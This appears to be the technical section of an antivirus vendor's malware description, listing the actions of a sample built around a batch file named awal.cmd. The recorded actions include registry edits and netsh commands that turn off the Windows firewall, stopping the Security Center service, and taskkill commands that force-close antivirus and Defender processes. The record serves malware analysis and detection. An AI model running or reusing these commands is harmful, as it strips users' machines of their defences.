Техническая информация
- [<HKLM>\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile] 'DoNotAllowExceptions' = '00000000'
- [<HKLM>\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile] 'EnableFirewall' = '00000000'
- '<SYSTEM32>\taskkill.exe' /f /im *AV*
- '<SYSTEM32>\taskkill.exe' /f /im *defender*.exe
- '<SYSTEM32>\taskkill.exe' /f /im *RTP.exe
- '<SYSTEM32>\net1.exe' stop "security center"
- '<SYSTEM32>\net.exe' stop "security center"
- '<SYSTEM32>\netsh.exe' firewall set opmode mode=disable
- '<SYSTEM32>\taskkill.exe' /f /im SM?RTP.exe
- '<SYSTEM32>\taskkill.exe' /f /im *av*.exe
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\1.tmp\awal.cmd""
- '<SYSTEM32>\taskkill.exe' /f /im *client*.*
- '<SYSTEM32>\taskkill.exe' /f /im *Security*.*
- '<SYSTEM32>\taskkill.exe' /f /im SM*RTP.exe
- %WINDIR%\awal.cmd
- %TEMP%\1.tmp\awal.cmd
- %TEMP%\1.tmp\awal.cmd
- ClassName: '(null)' WindowName: '(null)'